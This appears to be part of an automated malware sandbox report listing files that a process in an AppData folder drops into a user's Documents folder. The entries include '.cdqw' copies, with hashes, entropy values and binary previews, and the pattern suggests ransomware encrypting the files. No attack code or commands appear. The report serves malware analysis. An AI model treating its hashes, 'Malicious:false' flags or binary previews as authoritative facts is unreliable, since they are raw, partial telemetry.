                                                                                                                                                  Preview:DTBZGvO...y.9..3....m.=.R0W.}.l..A...Q...b..fS.C...2..i...N...c....l.....HO.DZ..#.;........d~...&.w}nL...q........BT1.....e......k..3?..wz..2....<"IL.<..m........6w.c_...y......=.....8.xR.w. ....__..A`VU.j..B.....3~.f..o..S.l..H.m.*!a...h(v.D....x.R...E#I.{.$ .E#V...3W.....#.t.y..t..Q.9......1b.h).H........]....X3..#"~*.9!.......5...(..s.......h.......*2s...k..0.T.2.zb.B,^..9.......,y..4...f.....*..G2..M..j-....>..........n.0>!.w..J..4.......#..<y..../M..\.j.....#Y.....@N...{}...2.......j.%...^...!FK"I%...@`....4QbD..\Hzut.,9fo.u...Y....UQ...?.#.a.l&r.W.KR..,.z...`N?EJ...........~z..1.et...4_n.....J.......O{_....V..]X.9|.n.-.9...........`.Kg..us._.[n.k.. ...t..R....$.$.^.I-..3...YX.v.h.......G...b.g{.{.d.(x..in.f.....).-....lb%Mff)U....0.v<..o+....IR.\/.BtX.=..h...../..\.(.>. .....%..l?..1%d_)!.......,*.~..$.=M...qJ.....Q.zqA{./...G..(...q/...P. P:k.......m7...}i.y..."l].^...E....I..H...F.7...`(...J...........4$...c2...6...).i..

                                                                                                                                                  C:\Users\user\Documents\DTBZGIOOSO.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8455685024436805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:eQ5Pn77K2/R7EajtcaEY3mKSgLQfRygFI6KgLx9wS3jIVKuo3xlpn4Vw2bD:l7rZxnEXK/8Iinw4Ign6D
                                                                                                                                                  MD5:893CC5F002E511DA3AE516AD7AB34483
                                                                                                                                                  SHA1:0F26EEEDB1C7E3AC0864E95CD642C52BA3EECB75
                                                                                                                                                  SHA-256:69B9AEF21F450FA80EA0663FC7D5D5F016D783AF7DD1E8889CE68C764FDED6AC
                                                                                                                                                  SHA-512:5AF7281BC4B8B5BE658852B7EBFCFD89538BF9FA5B1438211A4B73AD8BAF18FD79ACC1AD5F6EFF06D28B62C187A0088CB09EDB8A66A6BF0B52339A41461D230D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:DTBZGvO...y.9..3....m.=.R0W.}.l..A...Q...b..fS.C...2..i...N...c....l.....HO.DZ..#.;........d~...&.w}nL...q........BT1.....e......k..3?..wz..2....<"IL.<..m........6w.c_...y......=.....8.xR.w. ....__..A`VU.j..B.....3~.f..o..S.l..H.m.*!a...h(v.D....x.R...E#I.{.$ .E#V...3W.....#.t.y..t..Q.9......1b.h).H........]....X3..#"~*.9!.......5...(..s.......h.......*2s...k..0.T.2.zb.B,^..9.......,y..4...f.....*..G2..M..j-....>..........n.0>!.w..J..4.......#..<y..../M..\.j.....#Y.....@N...{}...2.......j.%...^...!FK"I%...@`....4QbD..\Hzut.,9fo.u...Y....UQ...?.#.a.l&r.W.KR..,.z...`N?EJ...........~z..1.et...4_n.....J.......O{_....V..]X.9|.n.-.9...........`.Kg..us._.[n.k.. ...t..R....$.$.^.I-..3...YX.v.h.......G...b.g{.{.d.(x..in.f.....).-....lb%Mff)U....0.v<..o+....IR.\/.BtX.=..h...../..\.(.>. .....%..l?..1%d_)!.......,*.~..$.=M...qJ.....Q.zqA{./...G..(...q/...P. P:k.......m7...}i.y..."l].^...E....I..H...F.7...`(...J...........4$...c2...6...).i..

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.845621862381916
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Q4polMqKoPrTavHzgKXz7+Fb5rS++R1+LoqAqB+xQvI2bD:pJVtZXP+F2+TBoxQjD
                                                                                                                                                  MD5:91A178D7249D6ADE3905C9CAD63D4EBE
                                                                                                                                                  SHA1:009AC34BA29F18E7258EA95C1B3D2747D2AC3A97
                                                                                                                                                  SHA-256:C06E0DA25583311E49EB736D9769B7ACC78CF8A9CC503A1198E697F591B9775B
                                                                                                                                                  SHA-512:AC58DFBE83FC10B7E781C5C1C03355D1E189741043C8930C62C6564A9AFE431BBB9D7704AEF17B8D0BCBDCDEEAB675507B73B589A0F442A57B7F35D978F4327F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSHJ3..#A.+.Y3.....K.9.&..$M.Bh...dj.l.A.T....*.Xz.L:...r/.....0..g...4A.<....."CI......P....L@@.....+.7.9..?'U.a.3.......>J`9V...@?."v...\@AF.7...>...D.|...._.v).....f..%$...:.C..E..$...r...........wC...Pn..`.e.+..........8..q.+..9.<l.m...l9.#.....J..,I._.LL.p.&.{.-.....Vik.....R..+..o......)U..F....6y.....J.F.%...z..,].ky.?..xF......P&.....-.....R.O3.&..d5....6.=H.....2.%m..RjR..mf...7%...?._.AH..D...j.Go..OP.....c.~"..]......;.I..G..l$._..{<..qi@6Z...k.eX...ap......r..gL...l#.u....t*h.}*......Ci>N..x.G.`n..\.....HO...zG.x7U...QJ..a.._\%..I....x...#.9...Lt..-...;...:.^i.=.f}.M...N~.@.w9.J..2/..`....DG..z.^......$.+.jDVQsw.....k.......1k7.>.....;rp.*.?:...G...Ji?%...zv>`W ...."...F....N....1......w..P:.p.q....GB....s.Z-.3|e..}K.=.g.Q.,Rm.9.".I..C...-...q.."..bD.\.V..x..I5........~..;l.1....Q.NFs;`."...xSv..,.C.........-5.hD.Q.,...GR.!>...j.t.k.8o.w-......2 ........h.w(bY.yeX<.4........V}A....k..Dw.....8.../....Q...:#a....#.)j.

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.845621862381916
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Q4polMqKoPrTavHzgKXz7+Fb5rS++R1+LoqAqB+xQvI2bD:pJVtZXP+F2+TBoxQjD
                                                                                                                                                  MD5:91A178D7249D6ADE3905C9CAD63D4EBE
                                                                                                                                                  SHA1:009AC34BA29F18E7258EA95C1B3D2747D2AC3A97
                                                                                                                                                  SHA-256:C06E0DA25583311E49EB736D9769B7ACC78CF8A9CC503A1198E697F591B9775B
                                                                                                                                                  SHA-512:AC58DFBE83FC10B7E781C5C1C03355D1E189741043C8930C62C6564A9AFE431BBB9D7704AEF17B8D0BCBDCDEEAB675507B73B589A0F442A57B7F35D978F4327F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSHJ3..#A.+.Y3.....K.9.&..$M.Bh...dj.l.A.T....*.Xz.L:...r/.....0..g...4A.<....."CI......P....L@@.....+.7.9..?'U.a.3.......>J`9V...@?."v...\@AF.7...>...D.|...._.v).....f..%$...:.C..E..$...r...........wC...Pn..`.e.+..........8..q.+..9.<l.m...l9.#.....J..,I._.LL.p.&.{.-.....Vik.....R..+..o......)U..F....6y.....J.F.%...z..,].ky.?..xF......P&.....-.....R.O3.&..d5....6.=H.....2.%m..RjR..mf...7%...?._.AH..D...j.Go..OP.....c.~"..]......;.I..G..l$._..{<..qi@6Z...k.eX...ap......r..gL...l#.u....t*h.}*......Ci>N..x.G.`n..\.....HO...zG.x7U...QJ..a.._\%..I....x...#.9...Lt..-...;...:.^i.=.f}.M...N~.@.w9.J..2/..`....DG..z.^......$.+.jDVQsw.....k.......1k7.>.....;rp.*.?:...G...Ji?%...zv>`W ...."...F....N....1......w..P:.p.q....GB....s.Z-.3|e..}K.=.g.Q.,Rm.9.".I..C...-...q.."..bD.\.V..x..I5........~..;l.1....Q.NFs;`."...xSv..,.C.........-5.hD.Q.,...GR.!>...j.t.k.8o.w-......2 ........h.w(bY.yeX<.4........V}A....k..Dw.....8.../....Q...:#a....#.)j.

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.859528659377037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:alBXurAr5Nhp084D8bEWCsQSUuGv9eDXKd4PS/TgYvsWOP48Lwi0dxW2bD:a6rAnp4D+EdJuGZ48TgaVO1LKdxdD
                                                                                                                                                  MD5:EB5777DD6CF727458B8BA317C0B02269
                                                                                                                                                  SHA1:E6D37F7C00D200A29E0074EF398E754B51883C42
                                                                                                                                                  SHA-256:981374C5E679270CEE56D3A2BA8B926BE9A0871AE9729E91795B6399A47E58F3
                                                                                                                                                  SHA-512:64D9A63E1325C63FD06CD8273D76D4E3CF3752DCCFCE942FE369964E72DD61668F1C47402B0D02FEFA5E918048E2F443F1EE55D880D3C600828256133DE2C328
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSH...t6.}..8,.9..P7.V.........x...F;.f..0.?...:._.....H.$.Fn_'.}.r..~V.'....&.0....d..o.o:]...T.K...s.....H...}N.FY._Kc..TD..$..7I}._{=U<....-M.........T_........q...B!YG.......B..cL......dK.k).j..VzF... _+.W9.c..U.m.'...I..Q.V%.g.A"..e@1....^....S.3..St-#.....,.~j..B...Jg.`.N.~.Igk"hI....$.d.......0.W.O....0q+...J."..(...2..k....U.....g....2E!..r.G.?..lL.y.#...A..!.!.g4.4..2..z.6.y..F..;.|...zw.f).T...Z.....mx]<@.....R..>_..r>:4(a...U....P>.I..... ........l..$uw /I...`).Z.D...3.o.E.-!+...;^..B.....m.NaC.W9.T....T..|......o..b....F.p.........@.3&)3.B.s....f.0e..b.."Z..?...$...(.{..i..Q.d3t....?.....U..>.mR...-,...C.7.q.=&.N{K...........;...Q.F..]..G.N.?.Y.Wg.(;...._$'.....t..@9J=.i.:....g..F..x.3N..XG..Q.T.eG.;...D....X@.J...........U....C..0E...k.X.oc`.+..q2...@..m.jW/vM....UN.C.ro..t..o....v|..U'D..c..A.|.XB|..R.....?e.#w.4........a1q"$.O....3....FG!....ts..29^\.cu.c....s.....6.@....8e*3......8........W...x.2...|.#.&.p....&yi.c..a...

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.859528659377037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:alBXurAr5Nhp084D8bEWCsQSUuGv9eDXKd4PS/TgYvsWOP48Lwi0dxW2bD:a6rAnp4D+EdJuGZ48TgaVO1LKdxdD
                                                                                                                                                  MD5:EB5777DD6CF727458B8BA317C0B02269
                                                                                                                                                  SHA1:E6D37F7C00D200A29E0074EF398E754B51883C42
                                                                                                                                                  SHA-256:981374C5E679270CEE56D3A2BA8B926BE9A0871AE9729E91795B6399A47E58F3
                                                                                                                                                  SHA-512:64D9A63E1325C63FD06CD8273D76D4E3CF3752DCCFCE942FE369964E72DD61668F1C47402B0D02FEFA5E918048E2F443F1EE55D880D3C600828256133DE2C328
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSH...t6.}..8,.9..P7.V.........x...F;.f..0.?...:._.....H.$.Fn_'.}.r..~V.'....&.0....d..o.o:]...T.K...s.....H...}N.FY._Kc..TD..$..7I}._{=U<....-M.........T_........q...B!YG.......B..cL......dK.k).j..VzF... _+.W9.c..U.m.'...I..Q.V%.g.A"..e@1....^....S.3..St-#.....,.~j..B...Jg.`.N.~.Igk"hI....$.d.......0.W.O....0q+...J."..(...2..k....U.....g....2E!..r.G.?..lL.y.#...A..!.!.g4.4..2..z.6.y..F..;.|...zw.f).T...Z.....mx]<@.....R..>_..r>:4(a...U....P>.I..... ........l..$uw /I...`).Z.D...3.o.E.-!+...;^..B.....m.NaC.W9.T....T..|......o..b....F.p.........@.3&)3.B.s....f.0e..b.."Z..?...$...(.{..i..Q.d3t....?.....U..>.mR...-,...C.7.q.=&.N{K...........;...Q.F..]..G.N.?.Y.Wg.(;...._$'.....t..@9J=.i.:....g..F..x.3N..XG..Q.T.eG.;...D....X@.J...........U....C..0E...k.X.oc`.+..q2...@..m.jW/vM....UN.C.ro..t..o....v|..U'D..c..A.|.XB|..R.....?e.#w.4........a1q"$.O....3....FG!....ts..29^\.cu.c....s.....6.@....8e*3......8........W...x.2...|.#.&.p....&yi.c..a...

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\IVHSHTCODI.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843805324422674
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7UKgNJVufEDFlsGpvN9vL+WlL3/AFDruqaN0T/yRmR5iMA56yQ0h42bD:7pqJVTNkWNIdXafyVpP0JD
                                                                                                                                                  MD5:C7FCCCAC2545209848AB4C070A1BD73F
                                                                                                                                                  SHA1:D764A5FA79BBE58347DE3A71E98345EDD694566D
                                                                                                                                                  SHA-256:B728F073FDB98710D69918E9BCAD5E4E562DDAFCBF44BABA576525B0474B93D7
                                                                                                                                                  SHA-512:3018D895195E1154625CDEDB5915DAA6A831AFE721E25EEB14DBB3AA745F14965613A6C412B7DD9CD30ED22A5A10BF4CF6C99AFBDB81E42A224364D6AA67845D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSH....W?.#....>.(.GT.[.L.V.z..L*d}n......Z...P.....q.a..L4r......~..?4....t.&..Jc..>.^.r...D..9....5.a..:.h..~3]Y..@/...&Li.2Cb...g.0.P.....'r...w:.. <..-.z.i......*.>s..%.Y)..Q...a.QJ...(N...........p.,.,. ?.S5WD....r.i..j.|..t......je..w.OX...y.6.t..x..I./.AB.N.v.)8..w;..hX..(./.....W..<...y.].....!..Y.b...&_...|.,.E.C.Y..5A..h.Y(.h...t.&...p.r \!....?..6.z.....A!.1...*...\Y.Z..s..a@....gX.13...u'.|G1.(..zla.S..L..f.:........g..q. ...Y}N..Z...T....k.....Gg...T.e...vp.R.n...G..> .a..Up..x....i3"v..6..aY.......Fg..H.u..$..:.7..B..].tc...o.A.l.`......?..M..%Y....3s.o.Cj.l....V8.s:.:.o.LI.P5Z.....:...G.V...{....a>....IK..7u...j.W.....r...X.q..w.T+...b.$o.8/Z.a.q:.B..\....x....(........1[..2.U.....,.C.....[.L13#.....pg.7.N.y....f.+X.....p..X.$E...m.4.&i.?;..J......)-....*5i.J_.Kz/...F.6.........L...X{....-}hl.jp..4.....t...... .[.....D.z.ZX.E..:1G..VU..b..N[.u%...I..j9.....iq,.....P.C.<M5wDh.kK..co.9....../....,(.-.>:}.V...Z\...e.M..

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\IVHSHTCODI.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843805324422674
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7UKgNJVufEDFlsGpvN9vL+WlL3/AFDruqaN0T/yRmR5iMA56yQ0h42bD:7pqJVTNkWNIdXafyVpP0JD
                                                                                                                                                  MD5:C7FCCCAC2545209848AB4C070A1BD73F
                                                                                                                                                  SHA1:D764A5FA79BBE58347DE3A71E98345EDD694566D
                                                                                                                                                  SHA-256:B728F073FDB98710D69918E9BCAD5E4E562DDAFCBF44BABA576525B0474B93D7
                                                                                                                                                  SHA-512:3018D895195E1154625CDEDB5915DAA6A831AFE721E25EEB14DBB3AA745F14965613A6C412B7DD9CD30ED22A5A10BF4CF6C99AFBDB81E42A224364D6AA67845D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:IVHSH....W?.#....>.(.GT.[.L.V.z..L*d}n......Z...P.....q.a..L4r......~..?4....t.&..Jc..>.^.r...D..9....5.a..:.h..~3]Y..@/...&Li.2Cb...g.0.P.....'r...w:.. <..-.z.i......*.>s..%.Y)..Q...a.QJ...(N...........p.,.,. ?.S5WD....r.i..j.|..t......je..w.OX...y.6.t..x..I./.AB.N.v.)8..w;..hX..(./.....W..<...y.].....!..Y.b...&_...|.,.E.C.Y..5A..h.Y(.h...t.&...p.r \!....?..6.z.....A!.1...*...\Y.Z..s..a@....gX.13...u'.|G1.(..zla.S..L..f.:........g..q. ...Y}N..Z...T....k.....Gg...T.e...vp.R.n...G..> .a..Up..x....i3"v..6..aY.......Fg..H.u..$..:.7..B..].tc...o.A.l.`......?..M..%Y....3s.o.Cj.l....V8.s:.:.o.LI.P5Z.....:...G.V...{....a>....IK..7u...j.W.....r...X.q..w.T+...b.$o.8/Z.a.q:.B..\....x....(........1[..2.U.....,.C.....[.L13#.....pg.7.N.y....f.+X.....p..X.$E...m.4.&i.?;..J......)-....*5i.J_.Kz/...F.6.........L...X{....-}hl.jp..4.....t...... .[.....D.z.ZX.E..:1G..VU..b..N[.u%...I..j9.....iq,.....P.C.<M5wDh.kK..co.9....../....,(.-.>:}.V...Z\...e.M..

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\ONBQCLYSPU.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.853811165182392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:laleXUZisvFM44cKZx0ol4Vm+FFTya6Z1grPpGZWhR2bD:YlIU154ZZZl4Vmjae1gzEZWhqD
                                                                                                                                                  MD5:55FC4B6FF65841DD57ECA478758DA6DA
                                                                                                                                                  SHA1:D7FD5BF4BD34401C2459EE3EE9917D0AACC64559
                                                                                                                                                  SHA-256:03384563695309597D1429FB413BDCAAF20C9ED7A8273940FBB033F0D1FC4A96
                                                                                                                                                  SHA-512:4519349890A19A7B065A442A801A94021B88EE35D16749CE166D553FA1B3824CDF735F3DAC0E39635105BE56416D6D4B70F04EC4082F642F5CF3CFEE1ADDD2F4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC'........._C.../...5J.&)#.n>..t[...^h.W.05..Y...5..>...HO1`...Y..l.5v..K...J,Y4.r.m'......ol..<. I}.........G.b.wJ6.I.~....US...,.12*}.'......x.?.B.y.5s.....Y..."..!ri-..:.9...C..o.>..Pl....U.v.P2:..E:..y.U.....k.s.i..+...........Y?oQ..6.:].=.~Pam.2?.....[\...)V....s<...e.>......N.YS....H......`..f.y.Dc|aN9...l....[:J..B;....~....m..&...).1....9<#[B...8_...j|1....$.1...mL..}B..Dxz.....&..nD.1..b.id.(...+@q....;..{..4.i.&G.a$*.U......f..I.<.T....."..........*(H.'.Ne.Ql.u....c#.{.,(].p...z..J..>...,Eg./.....H.........d.......~.r....s.;r..I...Y....."...*.`9Al.H.\.._......./jE...........9..D"&..zD6{F).%..p..'.(.9......(.+G.{._....mRy~.y..............<t&S!.i...../..b.,...\|...r.;.*Y..L..t>......z.>...d........hc.T...O..ME... ......G.pR.D..52.. .....#.}SiZ.q.c.E..7.1.V..U....J........xXs@.....&g.CI...Tf,..YE..t...DK..\;.P).=s..Y.-B....i.8.it!=UB... .s.".. ....<.\......&Z....f%7.o.Z.Dh....=.(.....ND8.I-..o....t...X.rz.U....@...M...}...v......R

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\ONBQCLYSPU.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.853811165182392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:laleXUZisvFM44cKZx0ol4Vm+FFTya6Z1grPpGZWhR2bD:YlIU154ZZZl4Vmjae1gzEZWhqD
                                                                                                                                                  MD5:55FC4B6FF65841DD57ECA478758DA6DA
                                                                                                                                                  SHA1:D7FD5BF4BD34401C2459EE3EE9917D0AACC64559
                                                                                                                                                  SHA-256:03384563695309597D1429FB413BDCAAF20C9ED7A8273940FBB033F0D1FC4A96
                                                                                                                                                  SHA-512:4519349890A19A7B065A442A801A94021B88EE35D16749CE166D553FA1B3824CDF735F3DAC0E39635105BE56416D6D4B70F04EC4082F642F5CF3CFEE1ADDD2F4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ONBQC'........._C.../...5J.&)#.n>..t[...^h.W.05..Y...5..>...HO1`...Y..l.5v..K...J,Y4.r.m'......ol..<. I}.........G.b.wJ6.I.~....US...,.12*}.'......x.?.B.y.5s.....Y..."..!ri-..:.9...C..o.>..Pl....U.v.P2:..E:..y.U.....k.s.i..+...........Y?oQ..6.:].=.~Pam.2?.....[\...)V....s<...e.>......N.YS....H......`..f.y.Dc|aN9...l....[:J..B;....~....m..&...).1....9<#[B...8_...j|1....$.1...mL..}B..Dxz.....&..nD.1..b.id.(...+@q....;..{..4.i.&G.a$*.U......f..I.<.T....."..........*(H.'.Ne.Ql.u....c#.{.,(].p...z..J..>...,Eg./.....H.........d.......~.r....s.;r..I...Y....."...*.`9Al.H.\.._......./jE...........9..D"&..zD6{F).%..p..'.(.9......(.+G.{._....mRy~.y..............<t&S!.i...../..b.,...\|...r.;.*Y..L..t>......z.>...d........hc.T...O..ME... ......G.pR.D..52.. .....#.}SiZ.q.c.E..7.1.V..U....J........xXs@.....&g.CI...Tf,..YE..t...DK..\;.P).=s..Y.-B....i.8.it!=UB... .s.".. ....<.\......&Z....f%7.o.Z.Dh....=.(.....ND8.I-..o....t...X.rz.U....@...M...}...v......R

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\TQDGENUHWP.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844770318079027
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Uz8C6mAt09X82EYpFVhkmWdI1KpWVCFDOPb1dTsWb80nm2bD:Uzf6mAt8XHEWCmF0pWiDOPRdTXtD
                                                                                                                                                  MD5:4945CD96E65B373F4DF0C8A9021D9A0A
                                                                                                                                                  SHA1:27C2D7D2504DB915EA79DF8B1A510D3DE23B8D8F
                                                                                                                                                  SHA-256:C364CDBEAD97AC027D69885E448C9E80E0659F7AC2BE48F973B7C526D6D255D5
                                                                                                                                                  SHA-512:1E0430E8E2FD1307C0120F2F1E9EE5A02F056B0F88DB0C00D2F8CEF0FAD13CD76673A874C634FE858F7F1C073B04E236894D3D2067B40ADA8B4355DB8B2438CB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.%...n.a...K..O.p.XP.#..-[.Ylc...9.G..62)..Q}..nv..L.,.V.".....g.S...gHW.i=.1.N......A.N....S.._.N....7A...DU..V.o..m...H.].....M....1..ce...!z..b.._. .......]K.#.<.L....|...t.%........OY~v#.....(....g. ........|..;....O..f.h...D.D.|.....[.:..N...h.bsfnl......t!o.....2M.(......OC...d;.7..M3xU..2...Z.e(........M.{.h!c..N....O.c.....U..Q.q.O...da.1..}..%d....../....{M^@.<d.s..".s8!De;V@]...Lq........o.4...<....N.....N...g....["/..#;....!u. '._MiX.g..[..5..}; 3.rm9AHw.............x...R...vVJ...m..m.q.....b.Y......%z+.E.._.......>.f...D....v....CXG@J...8.N....f.......|.Gq.4<..h..W{....S+Z|.J..EW.=....H....t.......3H......8.P0.....Z...].w.L..X0..*.X.....<.;....F*...R.>..>....q..B.....Y.({....5.m..+z...J.ot..q....&*......>.....S.5..\Hvb[...6....5Ov...}.#>`...5......+..h....$.+ .[-9.'.bL..\...t.,...x........U.;.Xl../...3....@....$.!1~.g.>...&i.....jn..b.....?..r;....?..L......gO...$x-gfF...T....N..S"r..IG.E.g.$l..MZ...-.E..:..1Iu...|R...m...

                                                                                                                                                  C:\Users\user\Documents\IVHSHTCODI\TQDGENUHWP.jpg.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844770318079027
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Uz8C6mAt09X82EYpFVhkmWdI1KpWVCFDOPb1dTsWb80nm2bD:Uzf6mAt8XHEWCmF0pWiDOPRdTXtD
                                                                                                                                                  MD5:4945CD96E65B373F4DF0C8A9021D9A0A
                                                                                                                                                  SHA1:27C2D7D2504DB915EA79DF8B1A510D3DE23B8D8F
                                                                                                                                                  SHA-256:C364CDBEAD97AC027D69885E448C9E80E0659F7AC2BE48F973B7C526D6D255D5
                                                                                                                                                  SHA-512:1E0430E8E2FD1307C0120F2F1E9EE5A02F056B0F88DB0C00D2F8CEF0FAD13CD76673A874C634FE858F7F1C073B04E236894D3D2067B40ADA8B4355DB8B2438CB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.%...n.a...K..O.p.XP.#..-[.Ylc...9.G..62)..Q}..nv..L.,.V.".....g.S...gHW.i=.1.N......A.N....S.._.N....7A...DU..V.o..m...H.].....M....1..ce...!z..b.._. .......]K.#.<.L....|...t.%........OY~v#.....(....g. ........|..;....O..f.h...D.D.|.....[.:..N...h.bsfnl......t!o.....2M.(......OC...d;.7..M3xU..2...Z.e(........M.{.h!c..N....O.c.....U..Q.q.O...da.1..}..%d....../....{M^@.<d.s..".s8!De;V@]...Lq........o.4...<....N.....N...g....["/..#;....!u. '._MiX.g..[..5..}; 3.rm9AHw.............x...R...vVJ...m..m.q.....b.Y......%z+.E.._.......>.f...D....v....CXG@J...8.N....f.......|.Gq.4<..h..W{....S+Z|.J..EW.=....H....t.......3H......8.P0.....Z...].w.L..X0..*.X.....<.;....F*...R.>..>....q..B.....Y.({....5.m..+z...J.ot..q....&*......>.....S.5..\Hvb[...6....5Ov...}.#>`...5......+..h....$.+ .[-9.'.bL..\...t.,...x........U.;.Xl../...3....@....$.!1~.g.>...&i.....jn..b.....?..r;....?..L......gO...$x-gfF...T....N..S"r..IG.E.g.$l..MZ...-.E..:..1Iu...|R...m...

                                                                                                                                                  C:\Users\user\Documents\JDSOXXXWOA.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.837231998886429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:A4zov6eZlFZ3HZYKknGFohemzQmrIIYUm7lZR8hT9FgBHGDMG8DMTfH1bXKOaV2X:lzov6ebFjYOmdrIIYUU4hTDgBHGD3k63
                                                                                                                                                  MD5:02FDD6251016418F1056BD5DED1C5837
                                                                                                                                                  SHA1:FFFCF37DA68B215712D0DECEC4DDBDBC53BAF7E4
                                                                                                                                                  SHA-256:8A0A69C23C477CB91A5EB1DB01B7B97A6949C28F3CC61D65C97156DC0CC5438C
                                                                                                                                                  SHA-512:D6035183BD325B8B5FDD6B3BFABFDF708665B3B71688767DAAAB9C2421E27E8D16C188678B98C9B8D3BEB47E374F755DCE5C272138E91F57B4A5B8B7E53A509B
                                                                                                                                                  Malicious:false
